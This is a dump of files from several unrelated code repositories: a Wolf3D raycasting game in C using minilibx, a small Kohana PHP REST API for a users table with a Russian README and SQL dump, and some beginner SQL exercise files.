void SetAge(int age);
void setSex(char sex);
const char* GetName() const;
int GetAge() const;
char GetSex() const;
void ShowMe() const;
};
int main_person_1();
| b5f440c3e1929d7b76350fed33bf39ef9674beb5 | [
"Markdown",
"C",
"C++",
"SQL"
] | 54 | C++ | FnEsc/Course-Code | 5734ac10bb2ebca3f7c8a9282784015599b0d505 | 7b5f3e828a9ef470004bd7b3edd4ed25ee6b5e4d |
refs/heads/master | <repo_name>jlamb916/Wolf3D<file_sep>/Makefile
# **************************************************************************** #
# #
# ::: :::::::: #
# Makefile :+: :+: :+: #
# +:+ +:+ +:+ #
# By: jolam <<EMAIL>> +#+ +:+ +#+ #
# +#+#+#+#+#+ +#+ #
# Created: 2019/05/23 00:53:07 by jolam #+# #+# #
# Updated: 2019/05/24 17:25:17 by knguyen- ### ########.fr #
# #
# **************************************************************************** #
NAME = wolf3d
SRC = main.c\
setup.c\
map.c\
move.c\
calc.c\
helper.c\
hooks.c\
draw_frame.c\
strafe.c
OBJ = $(addprefix $(OBJDIR), $(SRC:.c=.o))
GCC = gcc -g -Wall -Werror -Wextra
LIBFT = ./libft/libft.a
LIBINC = -I ./libft/includes
LIBLINK = -L ./libft -lft
MLX = ./minilibx/libmlx.a
MLXINC = -I ./minilibx
MLXLINK = -L ./minilibx -lmlx -framework OpenGl -framework Appkit
SRCDIR = ./srcs/
INCDIR = ./includes/
OBJDIR = ./objs/
all: obj libft mlx $(NAME)
obj:
mkdir -p $(OBJDIR)
$(OBJDIR)%.o:$(SRCDIR)%.c
$(GCC) $(LIBINC) $(MLXINC) -I $(INCDIR) -o $@ -c $<
libft: $(LIBFT)
mlx: $(MLX)
$(LIBFT):
make -C ./libft
$(MLX):
make -C ./minilibx
$(NAME): $(OBJ)
$(GCC) -o $(NAME) $(OBJ) $(MLXLINK) $(LIBLINK)
clean:
rm -rf $(OBJDIR)
make -C ./libft clean
make -C ./minilibx clean
fclean: clean
rm -rf $(NAME)
make -C ./libft fclean
re: fclean all
<file_sep>/srcs/hooks.c
/* ************************************************************************** */
/* */
/* ::: :::::::: */
/* hooks.c :+: :+: :+: */
/* +:+ +:+ +:+ */
/* By: jolam <<EMAIL>> +#+ +:+ +#+ */
/* +#+#+#+#+#+ +#+ */
/* Created: 2019/05/23 02:50:27 by jolam #+# #+# */
/* Updated: 2019/05/23 03:08:00 by jolam ### ########.fr */
/* */
/* ************************************************************************** */
#include "wolf3d.h"
int redraw(t_mlx *m)
{
mlx_clear_window(m->mlx_ptr, m->win_ptr);
drawframe(m);
return (0);
}
int closep(t_mlx *m)
{
kill(m->frk, SIGTSTP);
exit(0);
return (0);
}
int keyhandle(int key, t_mlx *m)
{
mlx_hook(m->win_ptr, 3, 0, hooks, m);
if (key == 53)
{
kill(m->frk, SIGTSTP);
exit(0);
}
else if (key == 126 || key == 13)
mlx_loop_hook(m->mlx_ptr, forward, m);
else if (key == 125 || key == 1)
mlx_loop_hook(m->mlx_ptr, back, m);
else if (key == 123 || key == 0)
mlx_loop_hook(m->mlx_ptr, leftstrafe, m);
else if (key == 124 || key == 2)
mlx_loop_hook(m->mlx_ptr, rightstrafe, m);
else if (key == 12 || key == 6)
mlx_loop_hook(m->mlx_ptr, left, m);
else if (key == 14 || key == 7)
mlx_loop_hook(m->mlx_ptr, right, m);
return (0);
}
int hooks(int key, t_mlx *m)
{
if (key == 53)
exit(0);
mlx_hook(m->win_ptr, 2, 0, keyhandle, m);
mlx_hook(m->win_ptr, 17, (1L << 17), closep, m);
if (key == 126 || key == 125 || key == 123 || key == 124 ||
key == 13 || key == 1 || key == 2 || key == 0 ||
key == 12 || key == 6 || key == 14 || key == 7)
mlx_loop_hook(m->mlx_ptr, redraw, m);
mlx_loop(m->mlx_ptr);
return (0);
}
<file_sep>/libft/get_next_line.c
/* ************************************************************************** */
/* */
/* ::: :::::::: */
/* get_next_line.c :+: :+: :+: */
/* +:+ +:+ +:+ */
/* By: knguyen- <<EMAIL>> +#+ +:+ +#+ */
/* +#+#+#+#+#+ +#+ */
/* Created: 2019/01/09 17:21:20 by knguyen- #+# #+# */
/* Updated: 2019/05/23 01:16:34 by jolam ### ########.fr */
/* */
/* ************************************************************************** */
#include "libft.h"
static int append_line(char **ldt, char **line)
{
int i;
char *temp;
i = 0;
while ((*ldt)[i] != '\n' && (*ldt)[i] != '\0')
i++;
if ((*ldt)[i] == '\n')
{
*line = ft_strsub(*ldt, 0, i);
temp = ft_strdup(&((*ldt)[i + 1]));
free(*ldt);
*ldt = temp;
if (!(*ldt)[0])
ft_strdel(ldt);
}
else
{
*line = ft_strdup(*ldt);
ft_strdel(ldt);
}
return (1);
}
static int ret_check(char **ldt, char **line, int ret, int fd)
{
if (ret < 0)
return (-1);
else if (ret == 0 && !ldt[fd])
return (0);
else
return (append_line(&ldt[fd], line));
}
int get_next_line(const int fd, char **line)
{
static char *ldt[4864];
char buffer[BUFF_SIZE + 1];
int ret;
char *temp;
if (fd < 0 || !line)
return (-1);
while ((ret = read(fd, buffer, BUFF_SIZE)) > 0)
{
buffer[ret] = '\0';
if (!ldt[fd])
ldt[fd] = ft_strdup(buffer);
else
{
temp = ft_strjoin(ldt[fd], buffer);
free(ldt[fd]);
ldt[fd] = temp;
}
if (ft_strchr(ldt[fd], '\n'))
break ;
}
return (ret_check(ldt, line, ret, fd));
}
<file_sep>/includes/wolf3d.h
/* ************************************************************************** */
/* */
/* ::: :::::::: */
/* wolf3d.h :+: :+: :+: */
/* +:+ +:+ +:+ */
/* By: knguyen- <<EMAIL>> +#+ +:+ +#+ */
/* +#+#+#+#+#+ +#+ */
/* Created: 2019/05/04 15:30:05 by knguyen- #+# #+# */
/* Updated: 2019/05/23 03:08:11 by jolam ### ########.fr */
/* */
/* ************************************************************************** */
#ifndef WOLF3D_H
# define WOLF3D_H
# define WIDTH 1200
# define HEIGHT 900
# include "libft.h"
# include <stdlib.h>
# include "mlx.h"
# include <math.h>
# include <time.h>
# include <fcntl.h>
# include <signal.h>
# include <unistd.h>
typedef struct s_mlx
{
void *mlx_ptr;
void *win_ptr;
void *img_ptr;
int bpp;
int endian;
int linesize;
double posx;
double posy;
double dirx;
double diry;
double dirxsave;
double planexsave;
double planex;
double planey;
int **map;
char *data;
double frames;
double posxs;
double posys;
pid_t frk;
int i;
int j;
int flag;
int mapw;
int maph;
double rotspeed;
double movespeed;
char *tex[10];
void *xpm;
int ts;
int texnum;
unsigned int color;
int texx;
int texy;
double wallx;
} t_mlx;
typedef struct s_reader
{
int fd;
int t;
char *line;
char **temp;
} t_reader;
typedef struct s_frame
{
double camerax;
double raydirx;
double raydiry;
int mapx;
int mapy;
double sidedistx;
double sidedisty;
double deltax;
double deltay;
double walldist;
double floorx;
double floory;
double playerdist;
double curdist;
double weight;
double curfloorx;
double curfloory;
int changex;
int changey;
int wall;
int side;
int lineh;
int drawstart;
int drawend;
} t_frame;
void calc_perp_wall(t_mlx *m, t_frame *frame);
void calc_textures(t_mlx *m, t_frame *frame);
void calc_floor_dist(t_mlx *m, t_frame *frame);
void draw_wall(t_mlx *m, t_frame *frame, int x);
void draw_floor_ceiling(t_mlx *m, t_frame *frame, int x);
void calc_wall_hit(t_mlx *m, t_frame *frame);
void init_ray(t_mlx *m, t_frame *f, int x);
void calc_dist(t_mlx *m, t_frame *frame);
int redraw(t_mlx *m);
void drawframe(t_mlx *m);
int hooks(int key, t_mlx *m);
int keyhandle(int key, t_mlx *m);
int forward(t_mlx *m);
int back(t_mlx *m);
int right(t_mlx *m);
int left(t_mlx *m);
int leftstrafe(t_mlx *m);
int rightstrafe(t_mlx *m);
void fixmap(t_mlx *m);
int floodfill(t_mlx *m, int x, int y);
void readfile(char *file, t_mlx *m);
void setup(t_mlx *m);
void setup_textures(t_mlx *m);
#endif
<file_sep>/srcs/map.c
/* ************************************************************************** */
/* */
/* ::: :::::::: */
/* map.c :+: :+: :+: */
/* +:+ +:+ +:+ */
/* By: jolam <<EMAIL>> +#+ +:+ +#+ */
/* +#+#+#+#+#+ +#+ */
/* Created: 2019/05/23 02:57:46 by jolam #+# #+# */
/* Updated: 2019/05/23 03:03:37 by jolam ### ########.fr */
/* */
/* ************************************************************************** */
#include "wolf3d.h"
static void update_pos(t_mlx *m, int j, int i)
{
if (m->map[j][i] == 9)
{
if (m->flag >= 1)
ft_putstrexit("Error: Map has more than 1 start");
m->posx = j;
m->posy = i;
m->flag++;
m->map[j][i] = 0;
}
else if (m->map[j][i] > 9 || m->map[j][i] < 0)
ft_putstrexit("Error: Map has invalid wall number");
}
static void validate(t_mlx *m)
{
int i;
int j;
int c;
c = 0;
m->flag = 0;
i = -1;
while (++i < m->mapw)
{
j = -1;
while (++j < m->maph)
{
update_pos(m, j, i);
}
}
if (m->flag == 0)
ft_putstrexit("Error: Map has no start");
}
static void fillmap(t_mlx *m, t_reader *r, char *file)
{
m->i = -1;
while (r->temp[++m->i])
free(r->temp[m->i]);
free(r->temp);
r->fd = open(file, O_RDONLY);
m->i = 0;
while (get_next_line(r->fd, &r->line) > 0)
{
r->temp = ft_strsplit(r->line, ' ');
free(r->line);
m->j = -1;
while (r->temp[++m->j])
m->map[m->i][m->j] = ft_atoi(r->temp[m->j]);
m->j != m->mapw ? ft_putstrexit("Invalid Map: Map not rectangular") : 0;
m->i++;
m->j = -1;
while (r->temp[++m->j])
free(r->temp[m->j]);
free(r->temp);
}
close(r->fd);
validate(m);
}
void readfile(char *file, t_mlx *m)
{
t_reader r;
r.t = -1;
m->mapw = 0;
if ((r.fd = open(file, O_DIRECTORY)) > 0)
ft_putstrexit("Error: Is directory");
if ((r.fd = open(file, O_RDONLY)) < 0)
ft_putstrexit("Error: No File");
get_next_line(r.fd, &r.line);
r.temp = ft_strsplit(r.line, ' ');
free(r.line);
while (r.temp[m->mapw])
m->mapw++;
m->maph = 1;
while ((get_next_line(r.fd, &r.line)) > 0 && m->maph++)
free(r.line);
m->map = (int **)ft_memalloc(sizeof(int *) * m->maph);
while (++r.t < m->maph)
m->map[r.t] = (int *)ft_memalloc(sizeof(int) * m->mapw);
close(r.fd);
fillmap(m, &r, file);
}
<file_sep>/srcs/setup.c
/* ************************************************************************** */
/* */
/* ::: :::::::: */
/* setup.c :+: :+: :+: */
/* +:+ +:+ +:+ */
/* By: jolam <<EMAIL>> +#+ +:+ +#+ */
/* +#+#+#+#+#+ +#+ */
/* Created: 2019/05/23 03:08:03 by jolam #+# #+# */
/* Updated: 2019/05/23 03:09:42 by jolam ### ########.fr */
/* */
/* ************************************************************************** */
#include "wolf3d.h"
void setup(t_mlx *m)
{
m->rotspeed = 0.05;
m->movespeed = 0.05;
m->dirx = -1;
m->diry = 0;
m->planex = 0;
m->planey = 0.66;
m->bpp = 8;
m->endian = 1;
m->linesize = 1 * WIDTH;
m->mlx_ptr = mlx_init();
m->win_ptr = mlx_new_window(m->mlx_ptr, WIDTH, HEIGHT, "Wolf");
m->img_ptr = mlx_new_image(m->mlx_ptr, WIDTH, HEIGHT);
m->data = mlx_get_data_addr(m->img_ptr, &(m->bpp),
&(m->linesize), &(m->endian));
}
static void setup_textures2(t_mlx *m)
{
m->xpm = mlx_xpm_file_to_image(m->mlx_ptr, "./tex/redbrick.xpm",
&m->ts, &m->ts);
m->tex[6] = mlx_get_data_addr(m->xpm, &m->bpp, &m->linesize, &m->endian);
m->xpm = mlx_xpm_file_to_image(m->mlx_ptr, "./tex/greystone.xpm",
&m->ts, &m->ts);
m->tex[7] = mlx_get_data_addr(m->xpm, &m->bpp, &m->linesize, &m->endian);
m->xpm = mlx_xpm_file_to_image(m->mlx_ptr, "./tex/pillar.xpm",
&m->ts, &m->ts);
m->tex[8] = mlx_get_data_addr(m->xpm, &m->bpp, &m->linesize, &m->endian);
m->xpm = mlx_xpm_file_to_image(m->mlx_ptr, "./tex/green.xpm",
&m->ts, &m->ts);
m->tex[9] = mlx_get_data_addr(m->xpm, &m->bpp, &m->linesize, &m->endian);
}
void setup_textures(t_mlx *m)
{
m->ts = 64;
m->xpm = mlx_xpm_file_to_image(m->mlx_ptr, "./tex/wood.xpm",
&m->ts, &m->ts);
m->tex[0] = mlx_get_data_addr(m->xpm, &m->bpp, &m->linesize, &m->endian);
m->xpm = mlx_xpm_file_to_image(m->mlx_ptr, "./tex/bluestone.xpm",
&m->ts, &m->ts);
m->tex[1] = mlx_get_data_addr(m->xpm, &m->bpp, &m->linesize, &m->endian);
m->xpm = mlx_xpm_file_to_image(m->mlx_ptr, "./tex/colorstone.xpm",
&m->ts, &m->ts);
m->tex[2] = mlx_get_data_addr(m->xpm, &m->bpp, &m->linesize, &m->endian);
m->xpm = mlx_xpm_file_to_image(m->mlx_ptr, "./tex/eagle.xpm",
&m->ts, &m->ts);
m->tex[3] = mlx_get_data_addr(m->xpm, &m->bpp, &m->linesize, &m->endian);
m->xpm = mlx_xpm_file_to_image(m->mlx_ptr, "./tex/purplestone.xpm",
&m->ts, &m->ts);
m->tex[4] = mlx_get_data_addr(m->xpm, &m->bpp, &m->linesize, &m->endian);
m->xpm = mlx_xpm_file_to_image(m->mlx_ptr, "./tex/mossy.xpm",
&m->ts, &m->ts);
m->tex[5] = mlx_get_data_addr(m->xpm, &m->bpp, &m->linesize, &m->endian);
setup_textures2(m);
}
<file_sep>/srcs/move.c
/* ************************************************************************** */
/* */
/* ::: :::::::: */
/* move.c :+: :+: :+: */
/* +:+ +:+ +:+ */
/* By: knguyen- <<EMAIL>> +#+ +:+ +#+ */
/* +#+#+#+#+#+ +#+ */
/* Created: 2019/05/10 17:31:44 by knguyen- #+# #+# */
/* Updated: 2019/05/23 17:55:58 by knguyen- ### ########.fr */
/* */
/* ************************************************************************** */
#include "../includes/wolf3d.h"
int forward(t_mlx *m)
{
m->map[(int)(m->posx + m->dirx * m->movespeed)][(int)m->posy] == 0 ?
m->posx += m->dirx * m->movespeed : 0;
m->map[(int)m->posx][(int)(m->posy + m->diry * m->movespeed)] == 0 ?
m->posy += m->diry * m->movespeed : 0;
redraw(m);
return (0);
}
int back(t_mlx *m)
{
m->map[(int)(m->posx - m->dirx * m->movespeed)][(int)m->posy] == 0 ?
m->posx -= m->dirx * m->movespeed : 0;
m->map[(int)m->posx][(int)(m->posy - m->diry * m->movespeed)] == 0 ?
m->posy -= m->diry * m->movespeed : 0;
redraw(m);
return (0);
}
int right(t_mlx *m)
{
m->planexsave = m->planex;
m->dirxsave = m->dirx;
m->dirx = m->dirx * cos(-m->rotspeed) - m->diry * sin(-m->rotspeed);
m->diry = m->dirxsave * sin(-m->rotspeed) + m->diry * cos(-m->rotspeed);
m->planex = m->planex * cos(-m->rotspeed) - m->planey * sin(-m->rotspeed);
m->planey = m->planexsave * sin(-m->rotspeed)
+ m->planey * cos(-m->rotspeed);
redraw(m);
return (0);
}
int left(t_mlx *m)
{
m->planexsave = m->planex;
m->dirxsave = m->dirx;
m->dirx = m->dirx * cos(m->rotspeed) - m->diry * sin(m->rotspeed);
m->diry = m->dirxsave * sin(m->rotspeed) + m->diry * cos(m->rotspeed);
m->planex = m->planex * cos(m->rotspeed) - m->planey * sin(m->rotspeed);
m->planey = m->planexsave * sin(m->rotspeed)
+ m->planey * cos(m->rotspeed);
redraw(m);
return (0);
}
<file_sep>/README.md
# Wolf3D
Recreating a version of FPS classic Wolfenstein 3d
42 Project: Graphics Branch
Tasked with recreating Wolf3d Using minilibx Library (allows you to open window, draw pixels, and take in keyboard inputs).
This project parses a file and recreates a 3d view of the map using raycasting.
Features
- Traverse the map with "WASD"
- Wall Collision
- Textured Walls, Floors and Cieling
- Music
<file_sep>/srcs/draw_frame.c
/* ************************************************************************** */
/* */
/* ::: :::::::: */
/* draw_frame.c :+: :+: :+: */
/* +:+ +:+ +:+ */
/* By: jolam <<EMAIL>> +#+ +:+ +#+ */
/* +#+#+#+#+#+ +#+ */
/* Created: 2019/05/23 02:40:51 by jolam #+# #+# */
/* Updated: 2019/05/25 21:29:53 by knguyen- ### ########.fr */
/* */
/* ************************************************************************** */
#include "wolf3d.h"
void drawframe(t_mlx *m)
{
t_frame frame;
int x;
x = 0;
while (x < WIDTH)
{
init_ray(m, &frame, x);
calc_dist(m, &frame);
calc_wall_hit(m, &frame);
calc_perp_wall(m, &frame);
calc_textures(m, &frame);
draw_wall(m, &frame, x);
calc_floor_dist(m, &frame);
draw_floor_ceiling(m, &frame, x);
x++;
}
mlx_put_image_to_window(m->mlx_ptr, m->win_ptr, m->img_ptr, 0, 0);
}
void init_ray(t_mlx *m, t_frame *frame, int x)
{
frame->camerax = 2 * x / (double)WIDTH - 1;
frame->raydirx = m->dirx + m->planex * frame->camerax;
frame->raydiry = m->diry + m->planey * frame->camerax;
frame->mapx = (int)m->posx;
frame->mapy = (int)m->posy;
frame->deltax = fabs(1 / frame->raydirx);
frame->deltay = fabs(1 / frame->raydiry);
frame->wall = 0;
}
void draw_wall(t_mlx *m, t_frame *frame, int x)
{
int d;
frame->lineh = (int)(HEIGHT / frame->walldist);
frame->drawstart = -frame->lineh / 2 + HEIGHT / 2;
if (frame->drawstart < 0)
frame->drawstart = 0;
frame->drawend = frame->lineh / 2 + HEIGHT / 2;
if (frame->drawend >= HEIGHT)
frame->drawend = HEIGHT;
frame->drawstart--;
while (++frame->drawstart < frame->drawend)
{
d = frame->drawstart * 256 - HEIGHT * 128 + frame->lineh * 128;
m->texy = ((d * 64) / frame->lineh) / 256;
m->color = ((unsigned int **)m->tex)[m->texnum][64
* m->texy + m->texx];
if (frame->side == 1)
m->color = (m->color >> 1) & 8355711;
((unsigned int *)m->data)[x + (WIDTH * frame->drawstart)] = m->color;
}
}
void draw_floor_ceiling(t_mlx *m, t_frame *frame, int x)
{
int t;
frame->playerdist = 0;
if (frame->drawend < 0)
frame->drawend = HEIGHT;
t = frame->drawend - 1;
while (++t < HEIGHT)
{
frame->curdist = HEIGHT / (2.0 * t - HEIGHT);
frame->weight = (frame->curdist - frame->playerdist) /
(frame->walldist - frame->playerdist);
frame->curfloorx = frame->weight * frame->floorx +
(1.0 - frame->weight) * m->posx;
frame->curfloory = frame->weight * frame->floory +
(1.0 - frame->weight) * m->posy;
m->texx = (int)(frame->curfloorx * 64) % 64;
m->texy = (int)(frame->curfloory * 64) % 64;
m->color = ((unsigned int **)m->tex)[5][64 *
m->texx + m->texy];
((unsigned int *)m->data)[x + (WIDTH * t)] = m->color;
((unsigned int *)m->data)[x + (WIDTH * (HEIGHT - t))] = m->color / 2;
}
}
<file_sep>/srcs/calc.c
/* ************************************************************************** */
/* */
/* ::: :::::::: */
/* calc.c :+: :+: :+: */
/* +:+ +:+ +:+ */
/* By: jolam <<EMAIL>> +#+ +:+ +#+ */
/* +#+#+#+#+#+ +#+ */
/* Created: 2019/05/23 02:46:57 by jolam #+# #+# */
/* Updated: 2019/05/24 17:34:54 by knguyen- ### ########.fr */
/* */
/* ************************************************************************** */
#include "wolf3d.h"
void calc_dist(t_mlx *m, t_frame *frame)
{
if (frame->raydirx < 0)
{
frame->changex = -1;
frame->sidedistx = (m->posx - frame->mapx) * frame->deltax;
}
else
{
frame->changex = 1;
frame->sidedistx = (frame->mapx + 1.0 - m->posx) * frame->deltax;
}
if (frame->raydiry < 0)
{
frame->changey = -1;
frame->sidedisty = (m->posy - frame->mapy) * frame->deltay;
}
else
{
frame->changey = 1;
frame->sidedisty = (frame->mapy + 1.0 - m->posy) * frame->deltay;
}
}
void calc_wall_hit(t_mlx *m, t_frame *frame)
{
while (frame->wall == 0)
{
if (frame->sidedistx < frame->sidedisty)
{
frame->sidedistx += frame->deltax;
frame->mapx += frame->changex;
frame->side = 0;
}
else
{
frame->sidedisty += frame->deltay;
frame->mapy += frame->changey;
frame->side = 1;
}
if (m->map[frame->mapx][frame->mapy] > 0 &&
m->map[frame->mapx][frame->mapy] != 11)
frame->wall = 1;
}
}
void calc_floor_dist(t_mlx *m, t_frame *frame)
{
if (frame->side == 0 && frame->raydirx > 0)
{
frame->floorx = frame->mapx;
frame->floory = frame->mapy + m->wallx;
}
else if (frame->side == 0 && frame->raydirx < 0)
{
frame->floorx = frame->mapx + 1;
frame->floory = frame->mapy + m->wallx;
}
else if (frame->side == 1 && frame->raydiry > 0)
{
frame->floorx = frame->mapx + m->wallx;
frame->floory = frame->mapy;
}
else
{
frame->floorx = frame->mapx + m->wallx;
frame->floory = frame->mapy + 1;
}
}
void calc_perp_wall(t_mlx *m, t_frame *frame)
{
if (frame->side == 0)
frame->walldist = (frame->mapx - m->posx +
(1 - frame->changex) / 2) / frame->raydirx;
else
frame->walldist = (frame->mapy - m->posy +
(1 - frame->changey) / 2) / frame->raydiry;
if (frame->side == 0)
m->wallx = m->posy + frame->walldist * frame->raydiry;
else if (frame->side == 1)
m->wallx = m->posx + frame->walldist * frame->raydirx;
if (frame->walldist < 0.01)
frame->walldist += 0.01;
}
void calc_textures(t_mlx *m, t_frame *frame)
{
m->wallx -= floor((m->wallx));
m->texx = (int)(m->wallx * (double)64);
if (frame->side == 0 && frame->raydirx > 0)
m->texx = 64 - m->texx - 1;
if (frame->side == 1 && frame->raydiry < 0)
m->texx = 64 - m->texx - 1;
m->texnum = m->map[frame->mapx][frame->mapy] - 1;
}
| b0607cc9fe59e6dcc106905ad14370c0ab0d47d8 | [
"Markdown",
"C",
"Makefile"
] | 10 | Makefile | jlamb916/Wolf3D | d0736c35311418b00905b4a20235b047f10f23a2 | e312214c26c46e282ff052b63f46908b3d18070c |
refs/heads/master | <file_sep># Тестовое задание для TurboDealer
[Действующий пример](http://turbodealer.eltigro.ru/) поднял у себя на сервере.
REST API тут - [/users/](http://turbodealer.eltigro.ru/users/), реализованы стандартные GET, POST, PUT, DELETE. По умолчанию, без параметра возвращается полный список пользователей. Ограничения по выдаче (limit) делать не стал, так как пример совсем простой и в таблице много записей не планируется. Да и не было в задаче пагинации при выводе. )
## Что использовал
- Kohana (<http://kohanaframework.org/>) - для MVC и роутинга.
- Bootstrap (<http://getbootstrap.com/>) - чтобы не возиться с вёрсткой.
- jQuery REST-плагин (https://github.com/jpillora/jquery.rest) - для удобства и компактности обращения к REST API.
## Установка
- 1) Клонировать репозиторий в папку отдельного домена в корень.
- 2) Создать базу данных (например: `turbodealer_test`).
- 3) Развернуть в неё дамп `turbodealer_test.sql` (находится в корне).
- 4) Поправить конфиг `/application/config/database.php` (он же и часть задания - хранилище данных можно изменить).
## Использование API
Способ обращения и использования API стандартен для REST. Путь обращения - `/users/`.
- `GET` `/users/` возращает JSON-массив со всеми существующими пользователями в порядке их добавления в БД.
- `GET` `/users/<id>` возращает JSON-массив с информацией о пользователе с идентификатором `id`.
- `POST` `/users/` с параметрами `{user_name : 'Ivan', user_surname : 'Petrov'}` добавляет нового пользователя.
- `PUT` `/users/<id>` с параметрами `{user_name : 'Ivan', user_surname : 'Petrov'}` обновляет данные пользователя с идентификатором `id`.
- `DELETE` `/users/<id>` удаляет пользователя с идентификатором `id`.
## Что смотреть
Чтобы не тратить лишнее время на поиск нужного во фреймворке:
- Роутинг: `/application/bootstrap.php`
- Контроллер: `/application/classes/Controller/Users.php`
- Модель: `/application/classes/Model/Users.php`
- Основная вьюшка: `/application/view/index.php`
- JS-логика: `/j/jcode.js`
<file_sep><?php defined('SYSPATH') or die('No direct script access.');
/**
* API-контролер для обработки REST-запросов к сущности "Пользователи".
* Формат ответов - JSON.
* Class Controller_Users
*/
class Controller_Users extends Controller {
public $users_model;
/**
* Чтобы не создавать экземпляр в каждом action'е
*/
public function before()
{
parent::before();
$this->users_model = new Model_Users();
}
/**
* Получение информации об пользователе
* GET method
*/
public function action_get_user ()
{
$result = array(
'users' => $this->users_model->getUser($this->request->param("id"))
);
echo json_encode($result);
}
/**
* Добавление нового пользователя
* POST метод
*/
public function action_post_user ()
{
// POST method
$result = array(
'result' => $this->users_model->addUser($this->request->post())
);
echo json_encode($result);
}
/**
* Редактирование информации о пользователе
* PUT метод
*/
public function action_put_user ()
{
parse_str($this->request->body(), $put_data);
$result = array(
'result' => $this->users_model->editUser($this->request->param("id"), $put_data)
);
echo json_encode($result);
}
/**
* Удаление юзера
* DELETE метод
*/
public function action_delete_user ()
{
$result = array(
'result' => $this->users_model->deleteUser($this->request->param("id"))
);
echo json_encode($result);
}
/**
* Получение списка пользователей
*/
public function action_list ()
{
$result = array(
'users' => $this->users_model->getUsers()
);
echo json_encode($result);
}
}
<file_sep>-- phpMyAdmin SQL Dump
-- version 4.4.15.7
-- http://www.phpmyadmin.net
--
-- Хост: 127.0.0.1:3306
-- Время создания: Окт 19 2016 г., 01:33
-- Версия сервера: 5.5.50
-- Версия PHP: 5.3.29
SET SQL_MODE = "NO_AUTO_VALUE_ON_ZERO";
SET time_zone = "+00:00";
/*!40101 SET @OLD_CHARACTER_SET_CLIENT=@@CHARACTER_SET_CLIENT */;
/*!40101 SET @OLD_CHARACTER_SET_RESULTS=@@CHARACTER_SET_RESULTS */;
/*!40101 SET @OLD_COLLATION_CONNECTION=@@COLLATION_CONNECTION */;
/*!40101 SET NAMES utf8mb4 */;
--
-- База данных: `turbodealer_test`
--
-- --------------------------------------------------------
--
-- Структура таблицы `users`
--
CREATE TABLE IF NOT EXISTS `users` (
`id` int(10) unsigned NOT NULL,
`name` varchar(250) DEFAULT '0',
`surname` varchar(250) DEFAULT '0'
) ENGINE=InnoDB AUTO_INCREMENT=10 DEFAULT CHARSET=utf8;
--
-- Дамп данных таблицы `users`
--
INSERT INTO `users` (`id`, `name`, `surname`) VALUES
(1, 'Иван', 'Петров'),
(4, 'Петя', 'Шаляпин'),
(6, 'Киса', 'Брыся'),
(7, 'Виктор', 'Цой');
--
-- Индексы сохранённых таблиц
--
--
-- Индексы таблицы `users`
--
ALTER TABLE `users`
ADD PRIMARY KEY (`id`);
--
-- AUTO_INCREMENT для сохранённых таблиц
--
--
-- AUTO_INCREMENT для таблицы `users`
--
ALTER TABLE `users`
MODIFY `id` int(10) unsigned NOT NULL AUTO_INCREMENT,AUTO_INCREMENT=10;
/*!40101 SET CHARACTER_SET_CLIENT=@OLD_CHARACTER_SET_CLIENT */;
/*!40101 SET CHARACTER_SET_RESULTS=@OLD_CHARACTER_SET_RESULTS */;
/*!40101 SET COLLATION_CONNECTION=@OLD_COLLATION_CONNECTION */;
<file_sep><?php defined('SYSPATH') or die('No direct script access.');
class Model_Users extends Model
{
/**
* Получение списка всех существующих пользователей
* @return mixed
*/
public function getUsers()
{
$results = DB::select()
->from("users")
->order_by('id', 'Asc');
return $results->execute()->as_array();
}
/**
* Полуение информации о конкретном пользователе
* @param $id ID пользователя
* @return mixed
*/
public function getUser($id)
{
$results = DB::select()
->from("users")
->where('id', '=', $id);
return $results->execute()->as_array();
}
/**
* Добавление нового пользователя
* @param $post Массив с $_POST
* @return object
*/
public function addUser($post)
{
$results = DB::insert("users", array('id', 'name', 'surname'))
->values(array('', $post["user_name"], $post["user_surname"]));
return $results->execute();
}
/**
* Редактирование информации о пользователе
* @param $id
* @param $put Массив с данными пользователя вида { user_name : 'Иван', user_surname : 'Петров' }
* @return object|boolean
*/
public function editUser($id, $put)
{
if ($id == "") return "Пустой id.";
$results = DB::update("users")
->set(array(
'name' => $put["user_name"],
'surname' => $put["user_surname"],
)
)
->where("id", "=", $id);
return $results->execute();
}
/**
* Удаление пользователя
* @param $id ID удаляемого пользователя
* @return object|boolean
*/
public function deleteUser($id)
{
if ($id == "") return "Пустой id .";
$results = DB::delete("users")
->where('id', '=', $id);
return $results->execute();
}
} | 65d73a5d6922352d073aa19f2a618c44d61a1fd6 | [
"Markdown",
"SQL",
"PHP"
] | 4 | Markdown | TigerSmile/turbodealer_test | 5c9e2ee96a5d49e7b36095c4d289ff97fb53acfc | a795d24684fe05d33ec98959c1bfd9638d969c91 |
refs/heads/main | <repo_name>ctdupuis/lab-sql-intro<file_sep>/artist.sql
-- Add 3 new artists to the artist table. (It already exists.)
INSERT INTO artists (name)
VALUES
("<NAME>"),
("The Blue Stones").
("Shinedown");
-- Select 10 artists in reverse alphabetical order.
SELECT * FROM artists ORDER BY name DESC LIMIT 10;
-- Select 5 artists in alphabetical order.
SELECT * FROM artists ORDER BY name ASC LIMIT 5;
-- Select all artists that start with the word ‘Black’.
SELECT * FROM artists WHERE name LIKE "%Black";
-- Select all artists that contain the word ‘Black’.
SELECT * FROM artists WHERE name LIKE "%Black%";<file_sep>/person.sql
-- Create a table called person that records a person’s id, name, age, height (in cm , city, favorite_color. id should be an auto-incrementing id/primary key (use type: SERIAL)
CREATE TABLE person (
id SERIAL PRIMARY KEY,
name VARCHAR(40),
age INTEGER,
height_cm FLOAT,
city VARCHAR(40),
favorite_color VARCHAR(20)
);
-- Add 5 different person into the person database. Remember to not include the person_id because it should auto-increment.
INSERT INTO person (name, age, height_cm, city favorite_color)
VALUES
('Cody', 25, 172.72, 'Lafayette', 'red'),
('Clayton', 24. 175, 'Lafayette', 'blue'),
('Daravy', 30, 180, 'Lafayette', 'yellow'),
('Tim', 38, 171.35, 'Lafayette', 'red'),
('Emily', 21, 169.40, '<NAME>', 'purple');
-- Select all the person in the person table by height from tallest to shortest.
SELECT * FROM person ORDER BY height_cm DESC;
-- Select all the person in the person table by height from shortest to tallest.
SELECT * FROM person ORDER BY height_cm ASC;
-- Select all the person in the person table by age from oldest to youngest.
SELECT * FROM person ORDER BY age ASC;
-- Select all the person in the person table older than age 20.
SELECT * FROM person WHERE age > 20;
-- Select all the person in the person table that are exactly 18.
SELECT * FROM person WHERE age = 18;
-- Select all the person in the person table that are less than 20 and older than 30.
SELECT * FROM person WHERE age < 20 AND age > 30;
-- Select all the person in the person table that are not 27 (use not equals).
SELECT * FROM person WHERE age != 27;
-- Select all the person in the person table where their favorite color is not red.
SELECT * FROM person WHERE favorite_color != "red";
-- Select all the person in the person table where their favorite color is not red and is not blue.
